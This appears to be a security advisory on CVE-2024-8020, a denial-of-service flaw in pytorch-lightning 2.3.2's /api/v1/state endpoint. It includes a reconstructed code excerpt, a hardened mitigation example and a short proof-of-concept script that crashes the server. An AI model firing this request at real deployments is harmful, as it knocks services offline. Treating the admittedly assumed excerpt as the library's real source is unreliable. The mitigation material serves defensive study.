A critical vulnerability (CVE-2024-8020) has been discovered in the lightning-ai/pytorch-lightning version 2.3.2. This vulnerability allows an attacker to cause a denial of service by sending an unexpected POST request to the /api/v1/state endpoint of LightningApp. The issue stems from improper handling of unexpected state values, which results in the server shutting down.

Exploit details

The vulnerability exists in the LightningApp class defined in the lightning_app.py source file. Specifically, the issue lies in the state.setter method, which does not handle unexpected state values properly. Here is the relevant code snippet:

class LightningApp:
    # Surrounding members are assumed here so the excerpt runs; only the setter is from the advisory.
    states = {"running", "stopped"}
    _state = "stopped"
    @property
    def state(self):
        return self._state
    @state.setter
    def state(self, value):
        if isinstance(value, str) and value.lower() in self.states:
            self._state = value.lower()
        else:
            # Any unexpected value tears down the whole server: this is the denial of service.
            print("Invalid state value, shutting down...")
            self.shutdown()
    def shutdown(self):
        raise SystemExit("server shut down")

As you can see, when an unexpected state value is set, the server automatically shuts down, resulting in a denial of service. An attacker can exploit this vulnerability by sending a carefully crafted POST request to the /api/v1/state endpoint.

To mitigate the vulnerability, the server should not shut down when receiving an unexpected state value. Instead, it should return an appropriate error message indicating that the request was invalid.
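As an added illustration of that mitigation (example code written for this writeup, not pytorch-lightning's own), here is a setter that rejects an unrecognised value with an error, together with a hypothetical request handler that turns that error into a 400 response instead of a shutdown. The class name, the sample state set and handle_state_request are all assumptions.

```python
# Added example, not project code: a hardened state setter that refuses unexpected
# values with an exception, so an invalid request can never reach shutdown().

class InvalidStateError(ValueError):
    """Raised when a client submits a state the app does not recognise."""


class HardenedApp:
    states = frozenset({"running", "stopped", "pending"})  # constructed sample set

    def __init__(self):
        self._state = "pending"
        self.shutdown_calls = 0  # counter lets the demo prove shutdown is never reached

    @property
    def state(self):
        return self._state

    @state.setter
    def state(self, value):
        # Validate type and membership up front; the only outcomes are "set" or "reject".
        if not isinstance(value, str) or value.lower() not in self.states:
            raise InvalidStateError(f"invalid state value: {value!r}")
        self._state = value.lower()

    def shutdown(self):
        self.shutdown_calls += 1


def handle_state_request(app, body):
    """Translate a JSON body from a /api/v1/state-style endpoint into a
    (status_code, message) pair, as a web handler would. Hypothetical helper,
    not a pytorch-lightning API."""
    if not isinstance(body, dict) or "state" not in body:
        return 400, "missing 'state' field"
    try:
        app.state = body["state"]
    except InvalidStateError as exc:
        return 400, str(exc)
    return 200, f"state set to {app.state}"
```

An unexpected value now yields a 400 and leaves the app running with its previous state, which is the behaviour the mitigation paragraph asks for.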

The following is a simple Python script that demonstrates the exploit:

import requests

target_url = "http://localhost:500/api/v1/state"
payload = {"state": "unexpected_value"}

response = requests.post(url=target_url, json=payload)
print(response.status_code)

This script sends a POST request to the target URL with an unexpected state value. If the request is successful, the server will shut down, and the script will print the HTTP response status code.

Original reference

- NVD - CVE-2024-8020

Codebase in question

- LightningApp class code

We recommend that all users of lightning-ai/pytorch-lightning version 2.3.2 update to the latest version as soon as possible. Additionally, developers should implement proper error handling and validation for user-submitted data to prevent similar issues in the future.

Timeline

Published on: 03/20/2025 10:15:39 UTC